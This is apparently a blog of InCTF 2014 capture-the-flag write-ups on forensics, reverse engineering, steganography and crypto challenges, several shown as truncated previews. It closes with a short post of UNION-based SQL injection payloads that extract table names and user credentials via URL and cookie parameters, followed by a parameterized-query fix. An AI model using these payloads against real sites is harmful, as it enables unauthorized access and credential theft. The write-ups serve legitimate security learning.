Showing posts with the label InCTF

InCTF 2014 - Forensics-8 300

Given a partition image, we need to mount it and get the flag.

    root@Vijay:~/Desktop/inctf 14/forensics# file Forensics-8
    Forensics-8: x86 boot sector; partition 1: ID=0xc, starthead 0, startsector 1, 97656 sectors, code offset 0xb8
    root@Vijay:~/Desktop/inctf 14/forensics#
    root@Vijay:~/Desktop/inctf 14/forensics#
    root@Vijay:~/Desktop/inctf 14/forensics#
    root@Vijay:~/Desktop/inctf 14/forensics# gparted Forensics-8
    ======================
    libparted : 2.3
    ======================
    root@Vijay:~/Desktop/inctf 14/forensics# parted Forensics-8
    GNU Parted 2.3
    Using /root/Desktop/inctf 14/forensics/Forensics-8
    Welcome to GNU Parted! Type 'help' to view a list of commands.
    (parted) unit
    Unit?  [compact]? B
    (parted)
    (parted) print
    Model:  (file) Disk

InCTF 2014 - Reverse 50

1. The first challenge was a compiled Python file. I used a Python decompiler to get the original code.

    root@Vijay:~/Desktop/inctf 14/reverse# file one
    one: python 2.7 byte-compiled

I got the printable sequence array values.

    >>> eflag = [131,
    ... 138,
    ... 219,
    ... 198,
    ... 201,
    ... 158,
    ... 151,
    ... 154,
    ... 134,
    ... 129,
    ... 128,
    ... 177,
    ... 135,
    ... 157,
    ... 177,
    ... 157,
    ... 154,
    ... 135,
    ... 130,
    ... 130,
    ... 177,
    ... 141,
    ... 129,
    ... 129,
    ... 130,
    ... 201,
    ... 199]
    >>> eflag
    [131, 138, 219, 198, 201, 158, 151, 154, 134, 129, 128, 177, 135, 157, 177, 157, 154, 135, 130, 130, 177, 141, 129, 129, 130, 201, 199]
    >>>
    >>> flag = ''.join(map(chr, map(lambda x: x ^ 238, eflag)))
    >>>
    >>> print flag
    md5('python_is_still_cool')

Next is the compiled Java class file. I used the jad decompiler to get the original class file.

    root@Vijay:~/Desktop/inctf 14/reverse# file two.class
    two.class: compiled Java

InCTF 2014 - Reverse 100

Hi, this is my first reverse engineering with GDB. The challenge was to get the flag from the display_function. First we should disassemble the executable file with objdump to see how the program control works.

    root@Vijay:~/Desktop/inctf 14/reverse# objdump -d four

    four:     file format elf32-i386

    Disassembly of section .init:

    080482f4 <_init>:
     80482f4:  53                    push   %ebx
     80482f5:  83 ec 08              sub    $0x8,%esp
     80482f8:  e8 b3 00 00 00        call   80483b0 <__x86.get_pc_thunk.bx>
     80482fd:  81 c3 03 1d 00 00     add    $0x1d03,%ebx
     8048303:  8b 83 fc ff ff ff     mov    -0x4(%ebx),%eax
     8048309:  85 c0                 test   %eax,%eax
     804830b:  74 05                 je     8048312 <_init+0x1e>
     804830d:  e8 3e 00 00 00        call   8048350 <__gmon_start__@plt>
     8048312:  83 c4 08              add    $0x8,%esp
     8048315:  5b                    pop    %ebx
     8048316:  c3                    ret

    Disassembly of section .plt:

    08048320 : 8

InCTF 2014 - Steganography 400

Given an image, the flag is hidden in the blue plane.

    import os,sys
    from PIL import Image  # the bare "import Image" only works with the legacy PIL package

    modi_bin = Image.open("modi.png").convert('RGB')
    bin = ''
    R = open('r.txt','w')
    G = open('g.txt','w')
    B = open('b.txt','w')
    # By analysing the text docs I found the blue plane's first column is embedded with data
    flag = ''
    flag1 = ''
    for h in range(modi_bin.size[1]): # Fetches Height
        count = 0
        binR = ''
        binG = ''
        binB = ''
        for w in range(modi_bin.size[0]): # Fetches Width
            count += 1
            # Collect the least significant bit of each colour channel
            binR += str(modi_bin.getpixel((w,h))[0] & 1)
            binG += str(modi_bin.getpixel((w,h))[1] & 1)
            binB += str(modi_bin.getpixel((w,h))[2] & 1)
            if w == 0: # blue plane first bit
                flag += str(modi_bin.getpixel((w,h))[2] & 1)
            if count == 8:
                R.write(binR)
                G.write(binG)
                B.write(binB)
                binR=' ';binG=' ';binB=' '
                count = 0
        R.write(binR+'\n')
        G.

InCTF 2014 - Crypto 300

This is also an RSA challenge, and a more interesting one: we are given an RSA-704 bit key. The factors are found in the wiki. I used openssl to finish this challenge.

    root@Vijay:# openssl rsa -inform PEM -text -pubin -in publickey.pem -modulus
    Public-Key: (704 bit)
    Modulus:
        00:e1:34:18:93:fe:6e:68:16:ce:c8:a9:70:a3:9c:
        00:fa:54:7c:7d:a2:cd:ed:ab:0a:62:b9:1c:46:51:
        a8:3f:96:38:0b:cf:ae:e2:6f:7e:86:61:07:90:63:
        89:42:1b:1e:68:d0:a1:7a:ad:c9:87:0b:98:58:e9:
        56:28:6e:39:99:e9:8c:ec:98:81:53:4a:c7:72:ae:
        78:f5:e8:ab:a1:e2:f8:d3:03:95:77:02:9d:87
    Exponent: 65537 (0x10001)
    Modulus=E1341893FE6E6816CEC8A970A39C00FA547C7DA2CDEDAB0A62B91C4651A83F96380BCFAEE26F7E866107906389421B1E68D0A17AADC9870B9858E956286E3999E98CEC9881534AC772AE78F5E8ABA1E2F8D3039577029D87
    writing RSA key
    -----BEGIN PUBLIC KEY-----
    MHQwDQYJKoZIhvcNAQEBBQADYwAwYAJZAOE0GJP+bmgWzsipcKOcAPpUfH2ize2r
    CmK5HEZRqD+WOAvPruJvfoZhB5BjiUIbHmjQoXqtyYcLmFjpVihuOZnpjOyYgVNK
    x3KuePXoq6Hi+NMDlXcCnYcCAwEAAQ==
    -----END PUBLIC KEY-

InCTF 2014 - Crypto 200

This challenge had made me mad. Somehow I finally managed to solve the challenge. This is an RSA crypto challenge, given a cipher and public key. This is the RSA low public exponent attack, e=3.

    root@Vijay:# openssl rsa -pubin -in pub.pem -text -noout -modulus
    Public-Key: (4096 bit)
    Modulus:
        00:d1:0b:a0:e9:cd:6d:d6:c3:89:5f:cd:f4:17:db:
        21:e5:81:22:60:89:c6:c7:58:7f:c4:1b:3d:78:df:
        f5:2c:0f:8c:29:dc:6b:e9:fc:cf:31:68:32:e6:ff:
        6f:f0:49:6e:9e:56:6e:cb:c1:31:06:4e:b8:47:5d:
        6c:1b:c8:28:be:4a:f4:54:ad:62:cb:f0:d1:d2:cd:
        5a:59:8a:24:1c:52:b1:6d:8e:e1:da:0c:a9:cc:56:
        30:3c:d0:70:71:0e:6c:18:1f:2a:31:c6:88:7e:52:
        cf:14:bd:76:f6:25:80:a8:46:92:f8:81:98:a9:38:
        49:0f:b2:de:19:41:b1:10:85:83:3d:ed:ca:16:67:
        3f:4a:e5:4b:e6:0f:e0:da:66:24:a5:3d:b2:32:dc:
        a6:c5:88:7d:72:3c:77:39:c4:76:ef:30:60:19:a0:
        57:f1:c6:be:37:a5:b8:20:d0:91:9a:cf:fd:18:63:
        d2:2c:6f:a7:30:fe:12:e8:15:35:9d:68:a4:ec:e1:
        c0:1e:f7:b0:ec:d9:59:91:b3:d9:71:d0:09:27:99:
        5e:d6:6e:d

InCTF 2014 - Crypto 100

There are three files: one.txt, one.txt.enc and second.txt.enc. The challenge is to decrypt second.txt.enc using the key. We have a message and its cipher, which is a hint that the operation was done using XOR. So XORing (Message ^ Cipher) = Key.

    #!/usr/bin/env python
    import hashlib

    """
    one.txt
    This sentence is encrypted using XOR cipher.
    """
    plain_text = open('one.txt','r').read().strip()

    """
    one.txt.enc
    LAcbGEUKHQEGDgsaHU8bGEUcFgwAEhUNHQtSHhYQFghSMyorWAwbGw0cCkE=
    """
    cipher_text = open('one.txt.enc','r').read().decode("base64")

    print plain_text
    print '---------------------------------------------------------------------'
    print cipher_text
    print '---------------------------------------------------------------------'

    # Convert both strings to lists of byte values
    plain_text = [ord(i) for i in plain_text]
    cipher_text = [ord(i) for i in cipher_text]

    key = ''
    for i in range(len(plain_text)):
        c = ((plain

InCTF 2014 - Crypto 50

Question:

    Zgyzhsxrksvi dzh lirtrmzoob wvevolkvw uli gsv Svyivd ozmtfztv. Gsv pvb uli gsrh ovevo rh svyivd.

Given Hint: The Atbash cipher is a very common, simple cipher. It was for the Hebrew alphabet, but modified here to work with the English alphabet. Basically, when encoded, an "A" becomes a "Z", "B" turns into "Y", etc. The Atbash cipher can be implemented as an Affine cipher by setting both "a" and "b" to 25.

We used the online tool http://rumkin.com/tools/cipher/atbash.php to decrypt the encoded message.

    This is your encoded/decoded text:
    Atbash cipher was originally developed for the Hebrew language. The key for this level is hebrew.
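The hint's claim that Atbash is the affine cipher with a = b = 25 can be checked directly. This added Python 3 example (not part of the original post) implements the general affine cipher E(x) = (a*x + b) mod 26 and its inverse, then applies it to the challenge text; the function names are chosen here.

```python
QUESTION = ("Zgyzhsxrksvi dzh lirtrmzoob wvevolkvw uli gsv Svyivd ozmtfztv. "
            "Gsv pvb uli gsrh ovevo rh svyivd.")


def affine(text, a, b):
    """Apply E(x) = (a*x + b) mod 26 to ASCII letters, keeping case and punctuation."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((a * (ord(ch) - base) + b) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def affine_decrypt(text, a, b):
    """Invert E: D(y) = a_inv * (y - b) mod 26. Requires gcd(a, 26) == 1."""
    a_inv = pow(a, -1, 26)  # Python 3.8+; raises ValueError when no inverse exists
    return affine(text, a_inv, (-a_inv * b) % 26)


def atbash(text):
    """Atbash as the affine cipher with a = b = 25, i.e. x -> 25 - x."""
    return affine(text, 25, 25)


if __name__ == "__main__":
    # 25 is its own inverse mod 26, so encrypting and decrypting are the same map.
    print(atbash(QUESTION))
    print(affine_decrypt(QUESTION, 25, 25))
```

Because 25 * 25 = 625 = 1 (mod 26), the decryption parameters come out as a = b = 25 again, which is why the same tool setting both encodes and decodes.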

SQL injection My First Try

    id=4 UNION ALL SELECT 1,2,3
    id=4 UNION ALL SELECT 1,table_name,3 from information_schema.tables
    id=4 UNION ALL SELECT 1,column_name,3 from information_schema.columns
    id=4 UNION ALL SELECT 1,username,password from users

Another is by cookies in PHP, where <query> = '$username':

    ' UNION ALL SELECT 1,2;#
    ' UNION ALL SELECT table_name,3 from information_schema.tables;#
    ' UNION ALL SELECT column_name,1 from information_schema.columns;#
    ' UNION ALL SELECT login, password from users;#

BASE64 converter: http://www.base64decode.org/

Use Tamper Data in the Mozilla browser to inject it.
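Why the last id= payload above returns credentials, and the fix, as an added Python 3 example (not from the original post): the same lookup is built once by string concatenation and once with a bound parameter. The posts/users schema and its rows are constructed, and an in-memory SQLite database stands in for the application's real database.

```python
import sqlite3

# Last id= payload from the list above, as it would arrive in the id parameter.
PAYLOAD = "4 UNION ALL SELECT 1,username,password from users"


def make_db():
    """Constructed sample schema and rows, for illustration only."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO posts VALUES (4, 'hello', 'first post');
        INSERT INTO users VALUES ('admin', 'constructed-hash');
    """)
    return db


def lookup_concatenated(db, raw_id):
    """Vulnerable: the request value becomes part of the SQL text."""
    sql = "SELECT id, title, body FROM posts WHERE id=" + raw_id
    return db.execute(sql).fetchall()


def lookup_bound(db, raw_id):
    """Hardened: the value is bound as data and is never parsed as SQL."""
    sql = "SELECT id, title, body FROM posts WHERE id=?"
    return db.execute(sql, (raw_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concatenated(db, PAYLOAD))  # post row plus users row
    print("bound:       ", lookup_bound(db, PAYLOAD))         # no rows
    print("bound, id=4: ", lookup_bound(db, "4"))             # the post row only
```

With the bound parameter the whole payload is compared to the id column as a single string, so the UNION never executes; the same applies to the cookie-based variant when '$username' is bound instead of interpolated.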